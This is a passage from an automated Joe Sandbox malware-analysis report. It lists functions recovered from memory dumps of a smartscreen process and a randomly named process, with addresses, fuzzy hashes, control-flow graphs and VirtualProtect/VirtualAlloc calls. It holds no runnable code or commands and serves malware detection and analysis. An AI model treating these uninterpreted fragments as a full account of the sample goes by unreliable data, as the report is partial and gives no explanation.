                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8bc000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 163384c0f88c1ff8f540d91166b13f804f5032787c7994554b301d4f7713e957
                                                                                                      • Instruction ID: da4fa5b68f2b9be0b836d0f6d180b7ee97ac9581057e342101efed885d8511d5
                                                                                                      • Opcode Fuzzy Hash: 163384c0f88c1ff8f540d91166b13f804f5032787c7994554b301d4f7713e957
                                                                                                      • Instruction Fuzzy Hash: 3BF0823581E38D8FDB519F74C9655D93FA0FF05300F4505FAE818C61A2DB349554CB41
                                                                                                      Function 00007FFD9B8B73E8 Relevance: .0, Instructions: 25COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B6000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b6000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f6a0695db53085cb6a13e14c691213f09762020df66258e61c56cf5f88350218
                                                                                                      • Instruction ID: c82132ec98d63748e2e50af5da0e0fcd9badc2220ed543b49aa6a646580c5ee2
                                                                                                      • Opcode Fuzzy Hash: f6a0695db53085cb6a13e14c691213f09762020df66258e61c56cf5f88350218
                                                                                                      • Instruction Fuzzy Hash: 59F0FE71E059298AE7A4DB28DC696A97AA1EF84745F1141FAD00D9A2D6CE342E834F40
                                                                                                      Function 00007FFD9B8BE8D5 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8bc000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 40517fb8d16cbfe7a24ce3e6b771b1e2ebf1a47a8181be54e30d15a99c918e56
                                                                                                      • Instruction ID: 1cf0ad35ddcbc36988d42db278c499f4a848a9f40df3d54f49dcd7808a31dcf2
                                                                                                      • Opcode Fuzzy Hash: 40517fb8d16cbfe7a24ce3e6b771b1e2ebf1a47a8181be54e30d15a99c918e56
                                                                                                      • Instruction Fuzzy Hash: A8E0D83284E28D4FE361676088751D43F90FF05300F4605BAE04C860E3DA1C5558CB42
                                                                                                      Function 00007FFD9B8CFF31 Relevance: .0, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8ca000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d96667ea489d6ddf68042b7462b62bf7c5f886a2abc16fdacbf68618fc6e1593
                                                                                                      • Instruction ID: c00480144541e9d029c5be940f6bbc020029dabb13e81213ae7c3a6a4a06578d
                                                                                                      • Opcode Fuzzy Hash: d96667ea489d6ddf68042b7462b62bf7c5f886a2abc16fdacbf68618fc6e1593
                                                                                                      • Instruction Fuzzy Hash: 74D02BA1F1494F47FB18EBC0C821ABD2F62EF10384F400078D46AAE1E9CF242D034780
                                                                                                      Function 00007FFD9B9060E9 Relevance: .0, Instructions: 13COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 948ac9d758c6c31c1c27691ebaca5092c2e4de9777b68126395164b8103bb3cd
                                                                                                      • Instruction ID: 80033d7110217501d2c5219ec31fb2c9294cd2d12766bb1716a1a0bceb8d751a
                                                                                                      • Opcode Fuzzy Hash: 948ac9d758c6c31c1c27691ebaca5092c2e4de9777b68126395164b8103bb3cd
                                                                                                      • Instruction Fuzzy Hash: B3D05EB5E19B1E9FEBA0DE58409835473A1FF14310F4200BD948893062DF385911DF00

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FFD9B8C68B6 Relevance: 6.5, Strings: 5, Instructions: 280COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8c5000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $%$)$+$`
                                                                                                      • API String ID: 0-1941960537
                                                                                                      • Opcode ID: a8f2f6f5273c2530670f8555fa323d56958ad2b24474c7ab9ab8ddcb7252815d
                                                                                                      • Instruction ID: fde7038374f8658dadeaf5cad069b5ef44a7d32096f5591bdbac845d3f2e88e6
                                                                                                      • Opcode Fuzzy Hash: a8f2f6f5273c2530670f8555fa323d56958ad2b24474c7ab9ab8ddcb7252815d
                                                                                                      • Instruction Fuzzy Hash: A2C1FF70A1952D8FDB65EB64C8A4BE9B3B2FF98304F5045F9C01D97295CE35AA81CF40
                                                                                                      Function 00007FFD9B8FEE8B Relevance: 6.4, Strings: 5, Instructions: 114COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($+$E$H$n
                                                                                                      • API String ID: 0-1773399086
                                                                                                      • Opcode ID: a392ba219d0f9af09d5f752be7e3a8ee9b790e57e90688b47b7508c6fdf98809
                                                                                                      • Instruction ID: 3e9d09bfea1d41305fb13ec4175ec04b8ee955d7217bcfd900b33686587a985d
                                                                                                      • Opcode Fuzzy Hash: a392ba219d0f9af09d5f752be7e3a8ee9b790e57e90688b47b7508c6fdf98809
                                                                                                      • Instruction Fuzzy Hash: 6C51F970A0A62D8FEB64DF54C8547A8B7F2FB98311F1042FAD10D97295CB346E858F81
                                                                                                      Function 00007FFD9B8FF29E Relevance: 5.0, Strings: 4, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$j$u$}
                                                                                                      • API String ID: 0-684171762
                                                                                                      • Opcode ID: 53f0a007941ae862f817e9b55d0778dcb3f5f974c25ba6b356110aa00bccf286
                                                                                                      • Instruction ID: f2e335b5760e1deb53c7a3db710e069aecc55e82b93664e98115535618eb3222
                                                                                                      • Opcode Fuzzy Hash: 53f0a007941ae862f817e9b55d0778dcb3f5f974c25ba6b356110aa00bccf286
                                                                                                      • Instruction Fuzzy Hash: 14110031B0A22D8BDB64CF54C9947A9B7F2EF98311F1481A5C10D562A5CB746E85CF81

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.7%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:7
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 20981 7ffd9b8c17ce 20982 7ffd9b8c17dd VirtualProtect 20981->20982 20984 7ffd9b8c191d 20982->20984 20985 7ffd9b8c31bd 20986 7ffd9b8c31db VirtualAlloc 20985->20986 20987 7ffd9b8c3173 20985->20987 20989 7ffd9b8c32f5 20986->20989

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B8CAEFD Relevance: 4.3, Strings: 1, Instructions: 3029COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8ca000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: qJ_H
                                                                                                      • API String ID: 0-3404634314
                                                                                                      • Opcode ID: 6a1865b19b03545fce5c72ecb2f175a6a5890cc1f683b236642b46be89cd05ba
                                                                                                      • Instruction ID: 0048262c28b649326b7551518a4dd799083d81145e38c46802c8ac770bb8ee4a
                                                                                                      • Opcode Fuzzy Hash: 6a1865b19b03545fce5c72ecb2f175a6a5890cc1f683b236642b46be89cd05ba
                                                                                                      • Instruction Fuzzy Hash: C343E170A1995D8FDBA8EB58C8A5BB9B7B1FF58300F1446EAD00DD3295DA346E81CF40
                                                                                                      Function 00007FFD9B8BEC39 Relevance: 2.6, Strings: 1, Instructions: 1326COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8bc000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078
                                                                                                      • Opcode ID: f653c15afaaefdb8b67a06c61a63cb294dd38ee509ac527423323246f276a1ed
                                                                                                      • Instruction ID: 5c5026fd67ced323ee55319914428808d0a309942834b1ba004432ebb3751844
                                                                                                      • Opcode Fuzzy Hash: f653c15afaaefdb8b67a06c61a63cb294dd38ee509ac527423323246f276a1ed
                                                                                                      • Instruction Fuzzy Hash: 46C2C770E0962D8FDBA8DB68C895BA8B7B1FF58300F1141E9D41DE7265DA34AE81CF40
                                                                                                      Function 00007FFD9B8F91CD Relevance: 1.8, Strings: 1, Instructions: 520COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 701 7ffd9b8f91cd-7ffd9b8f91ec 703 7ffd9b8f9236-7ffd9b8f92c5 701->703 704 7ffd9b8f91ee-7ffd9b8f9222 701->704 708 7ffd9b8f92c7-7ffd9b8f92cc 703->708 709 7ffd9b8f92cf-7ffd9b8f92d8 703->709 706 7ffd9b8f9229-7ffd9b8f9233 704->706 707 7ffd9b8f9224 704->707 706->703 707->706 708->709 710 7ffd9b8f9750-7ffd9b8f9756 709->710 711 7ffd9b8f975c-7ffd9b8f9775 710->711 712 7ffd9b8f92dd-7ffd9b8f9307 710->712 713 7ffd9b8f9309 712->713 714 7ffd9b8f930e-7ffd9b8f9327 712->714 713->714 715 7ffd9b8f9329 714->715 716 7ffd9b8f932e-7ffd9b8f9348 714->716 715->716 718 7ffd9b8f934a 716->718 719 7ffd9b8f934f-7ffd9b8f9367 716->719 718->719 720 7ffd9b8f9369 719->720 721 7ffd9b8f936e-7ffd9b8f938f 719->721 720->721 722 7ffd9b8f9391-7ffd9b8f9395 721->722 723 7ffd9b8f93fd-7ffd9b8f941a 721->723 722->723 724 7ffd9b8f9397-7ffd9b8f93ab 722->724 725 7ffd9b8f941c 723->725 726 7ffd9b8f9421-7ffd9b8f943a 723->726 729 7ffd9b8f93ef-7ffd9b8f93f5 724->729 725->726 727 7ffd9b8f943c 726->727 728 7ffd9b8f9441-7ffd9b8f945b 726->728 727->728 730 7ffd9b8f9462-7ffd9b8f947a 728->730 731 7ffd9b8f945d 728->731 732 7ffd9b8f93f7-7ffd9b8f93f8 729->732 733 7ffd9b8f93ad-7ffd9b8f93b1 729->733 736 7ffd9b8f947c 730->736 737 7ffd9b8f9481-7ffd9b8f948b 730->737 731->730 738 7ffd9b8f948e-7ffd9b8f9590 732->738 734 7ffd9b8f93bc-7ffd9b8f93d2 733->734 735 7ffd9b8f93b3-7ffd9b8f93b9 733->735 739 7ffd9b8f93d9-7ffd9b8f93ec 734->739 740 7ffd9b8f93d4 734->740 735->734 736->737 737->738 741 7ffd9b8f95a5-7ffd9b8f9612 738->741 742 7ffd9b8f9592-7ffd9b8f95a2 738->742 739->729 740->739 743 7ffd9b8f966b-7ffd9b8f966f 741->743 744 7ffd9b8f9614-7ffd9b8f962d 741->744 742->741 745 7ffd9b8f9676-7ffd9b8f968f 743->745 746 7ffd9b8f9671 743->746 747 7ffd9b8f96a0-7ffd9b8f96b7 744->747 748 7ffd9b8f962f-7ffd9b8f9633 744->748 749 7ffd9b8f9692-7ffd9b8f9698 745->749 746->745 750 7ffd9b8f96b9 747->750 751 7ffd9b8f96be-7ffd9b8f96d8 747->751 748->747 752 7ffd9b8f9635-7ffd9b8f9644 748->752 753 7ffd9b8f969a-7ffd9b8f969b 749->753 754 7ffd9b8f9646-7ffd9b8f964a 749->754 750->751 755 7ffd9b8f96da 751->755 756 7ffd9b8f96df-7ffd9b8f9703 751->756 752->749 761 7ffd9b8f9748-7ffd9b8f974d 753->761 759 7ffd9b8f964c-7ffd9b8f965b 754->759 760 7ffd9b8f965e-7ffd9b8f9665 754->760 755->756 757 7ffd9b8f970a-7ffd9b8f972e 756->757 758 7ffd9b8f9705 756->758 762 7ffd9b8f9735-7ffd9b8f9746 757->762 763 7ffd9b8f9730 757->763 758->757 759->760 760->743 761->710 762->761 763->762
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078
                                                                                                      • Opcode ID: 6c8596f981219f740242556054f9394dff7740692c1673a82b4a95a9340200f6
                                                                                                      • Instruction ID: cd1739c9f012c519d022465df6fb093ef66a0276e07ae285cc1f4ee687b84f2b
                                                                                                      • Opcode Fuzzy Hash: 6c8596f981219f740242556054f9394dff7740692c1673a82b4a95a9340200f6
                                                                                                      • Instruction Fuzzy Hash: 15222870E0461D8FDB58DFA8C495AEDBBF1FF48300F148669D419EB25ADA34A981CF90
                                                                                                      Function 00007FFD9B904164 Relevance: 1.6, Strings: 1, Instructions: 374COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: 10f6be02accdea8fd7d62e2ff77db0aaf6ef70f9c2ee68a3e4e38af9b57db3e9
                                                                                                      • Instruction ID: 10daf4ba2efc5297a213f041309d12e66d2550bbf5fcb4cf5589d5a24ec31789
                                                                                                      • Opcode Fuzzy Hash: 10f6be02accdea8fd7d62e2ff77db0aaf6ef70f9c2ee68a3e4e38af9b57db3e9
                                                                                                      • Instruction Fuzzy Hash: 9FF10E74E1965D9FDBA8DB58C8A5BA8B7F1FF58300F5106B9D04DE32A1DA346A80CF40
                                                                                                      Function 00007FFD9B8B0DA0 Relevance: .3, Instructions: 293COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 967 7ffd9b8b0da0-7ffd9b8b0db7 968 7ffd9b8b0db9 967->968 969 7ffd9b8b0dba-7ffd9b8b0df9 967->969 968->969 970 7ffd9b8b0dfb 969->970 971 7ffd9b8b0e00-7ffd9b8b0eb7 call 7ffd9b8b07d0 969->971 970->971 984 7ffd9b8b0eb9-7ffd9b8b0ece 971->984 985 7ffd9b8b0ecf-7ffd9b8b0fa8 971->985 984->985 998 7ffd9b8b0faa-7ffd9b8b0fbe 985->998 999 7ffd9b8b0fc0-7ffd9b8b0fe3 985->999 998->999 1002 7ffd9b8b0feb-7ffd9b8b10dc 999->1002
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8b0000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9c4bc506a4ee031489b558151015c0c5741877e46702bac7ad32b3f873339ac9
                                                                                                      • Instruction ID: 5f2d9a63f816d37312f1e32c0e3eb8c46260b23babd57725d25b73dfc850e270
                                                                                                      • Opcode Fuzzy Hash: 9c4bc506a4ee031489b558151015c0c5741877e46702bac7ad32b3f873339ac9
                                                                                                      • Instruction Fuzzy Hash: 46A1E171A18A9D8FE799DB68C8657A97FF1FF59304F4001BAD048D72E6CB782805CB81
                                                                                                      Function 00007FFD9B8C5F66 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 681 7ffd9b8c5f66-7ffd9b8c5f99 683 7ffd9b8c5fa3-7ffd9b8c5fbb 681->683 684 7ffd9b8c5fc6-7ffd9b8c5fcd 683->684 685 7ffd9b8c5fcf-7ffd9b8c66d7 684->685 686 7ffd9b8c5fed-7ffd9b8c6783 684->686 685->684 693 7ffd9b8c66dd-7ffd9b8c66e7 685->693 686->684 693->684
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c5000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: +$pO_H
                                                                                                      • API String ID: 0-3174383562
                                                                                                      • Opcode ID: cba1316061d1e5d4de150c412fd7e33a5d8011d10cfeb8d0856a63c1ba8d0d6c
                                                                                                      • Instruction ID: f860edcf78b7433ca9f67f518045b2a17af05d9ceb8e1cb84ae0c09abf0221ed
                                                                                                      • Opcode Fuzzy Hash: cba1316061d1e5d4de150c412fd7e33a5d8011d10cfeb8d0856a63c1ba8d0d6c
                                                                                                      • Instruction Fuzzy Hash: 0F11ECB4A1A61D8BDBB8DB58C8A47E977B1EB5C300F1141A9E00ED7395CE786B84CB40
                                                                                                      Function 00007FFD9B8BAE5E Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 694 7ffd9b8bae5e-7ffd9b8bae72 695 7ffd9b8bae7c-7ffd9b8bae89 694->695 696 7ffd9b8b8ba8-7ffd9b8b8bfd 695->696 697 7ffd9b8bae8f-7ffd9b8baebf 695->697
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8B6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B6000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8b6000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$)
                                                                                                      • API String ID: 0-2010264150
                                                                                                      • Opcode ID: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction ID: b13dcafab310b3614f50832ca9006d92f5bf462bd641c6c32ffca35281652be5
                                                                                                      • Opcode Fuzzy Hash: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction Fuzzy Hash: 9411CE70D1662E8EEBB4AB69C8587A9B6B0FF08301F1140F9D44DA2291DB745AC48F46
                                                                                                      Function 00007FFD9B8C17CE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 765 7ffd9b8c17ce-7ffd9b8c17db 766 7ffd9b8c17e6-7ffd9b8c17f7 765->766 767 7ffd9b8c17dd-7ffd9b8c17e5 765->767 768 7ffd9b8c17f9-7ffd9b8c1801 766->768 769 7ffd9b8c1802-7ffd9b8c191b VirtualProtect 766->769 767->766 768->769 774 7ffd9b8c191d 769->774 775 7ffd9b8c1923-7ffd9b8c1973 769->775 774->775
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c1000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 0316a038b8e9eb0b2cb2249e16bdb37a1aa7801c468ecbbd39aba21e29c0d2df
                                                                                                      • Instruction ID: d8287f73f67c48242572c84596b29e8831f841b83abbde8c8b56f25c95c7d645
                                                                                                      • Opcode Fuzzy Hash: 0316a038b8e9eb0b2cb2249e16bdb37a1aa7801c468ecbbd39aba21e29c0d2df
                                                                                                      • Instruction Fuzzy Hash: DC517D70D0864D8FDB58DFA8C885BEDBBF1FB6A310F1042AAD448E3251DB74A885CB41
                                                                                                      Function 00007FFD9B8C31BD Relevance: 1.5, APIs: 1, Instructions: 223memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 862 7ffd9b8c31bd-7ffd9b8c31d9 863 7ffd9b8c31db-7ffd9b8c32f3 VirtualAlloc 862->863 864 7ffd9b8c3173-7ffd9b8c31ba 862->864 871 7ffd9b8c32f5 863->871 872 7ffd9b8c32fb-7ffd9b8c335f 863->872 871->872
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c1000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 19d86ae87c507e2d1f69790e6fbda2095b3edf0e77a09985e595b26132a6d968
                                                                                                      • Instruction ID: 84d77b42f19d3f93b74a33ec777f94c847bb0548f253b6662ebdde184eebbfd5
                                                                                                      • Opcode Fuzzy Hash: 19d86ae87c507e2d1f69790e6fbda2095b3edf0e77a09985e595b26132a6d968
                                                                                                      • Instruction Fuzzy Hash: C0614E70908A5D8FDF98EF58C885BE9BBF1FB69310F1041AAD44DE3255DB30A985CB80
                                                                                                      Function 00007FFD9B9011D8 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 875 7ffd9b9011d8-7ffd9b90122e
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2G_^
                                                                                                      • API String ID: 0-3208857883
                                                                                                      • Opcode ID: 38965ee8b88ccab199b3ca1490ea9b7a9fe03a8b6d1faab2de608c4068e608df
                                                                                                      • Instruction ID: d2f9e31b1170dea2d679410746b1666f5e3cc1fd86fa33d85833eb01e68fb97a
                                                                                                      • Opcode Fuzzy Hash: 38965ee8b88ccab199b3ca1490ea9b7a9fe03a8b6d1faab2de608c4068e608df
                                                                                                      • Instruction Fuzzy Hash: 1F110635A081598FCB0AFF6CE8A59E97BA0EF45318F0440B7E15DC7197DE349942C780
                                                                                                      Function 00007FFD9B8FC45D Relevance: .4, Instructions: 440COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b1f46d6e71233a20baf02dd7e23ca2265f5da900713bc9655a806439f28d6dd5
                                                                                                      • Instruction ID: 21599a64ff39d9e0ecc0cfd284d6d1f060f367cea88e0f7fde073e688f303af6
                                                                                                      • Opcode Fuzzy Hash: b1f46d6e71233a20baf02dd7e23ca2265f5da900713bc9655a806439f28d6dd5
                                                                                                      • Instruction Fuzzy Hash: E5F13F71E1965D8FDB98DB98C8657B8BBA1FF58300F4442B9D00DD3292DA346A85CF41
                                                                                                      Function 00007FFD9B8C81B9 Relevance: .1, Instructions: 141COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1040 7ffd9b8c81b9-7ffd9b8c8204 1042 7ffd9b8c820b-7ffd9b8c8211 1040->1042 1043 7ffd9b8c8206 1040->1043 1044 7ffd9b8c82e5-7ffd9b8c82eb 1042->1044 1043->1042 1045 7ffd9b8c8216-7ffd9b8c824c 1044->1045 1046 7ffd9b8c82f1-7ffd9b8c82fa 1044->1046 1048 7ffd9b8c8252-7ffd9b8c82bf 1045->1048 1053 7ffd9b8c82c1-7ffd9b8c82ca 1048->1053 1054 7ffd9b8c82dd-7ffd9b8c82e2 1048->1054 1053->1054 1055 7ffd9b8c82cc-7ffd9b8c82dc 1053->1055 1054->1044
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c5000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5d56722339f73a14b8c7ef1eb29c17ffa6f9285979d6097fec14e01605c0f760
                                                                                                      • Instruction ID: 2e31925a6288af58259525345832f15a3b9c42e1385d9ff439bbb1d26fc4860b
                                                                                                      • Opcode Fuzzy Hash: 5d56722339f73a14b8c7ef1eb29c17ffa6f9285979d6097fec14e01605c0f760
                                                                                                      • Instruction Fuzzy Hash: 9D518F70A09A4E9FCF84EF98D494AED7BF1FF58311F0501AAE419E7261D634E991CB80
                                                                                                      Function 00007FFD9B8F981D Relevance: .1, Instructions: 138COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
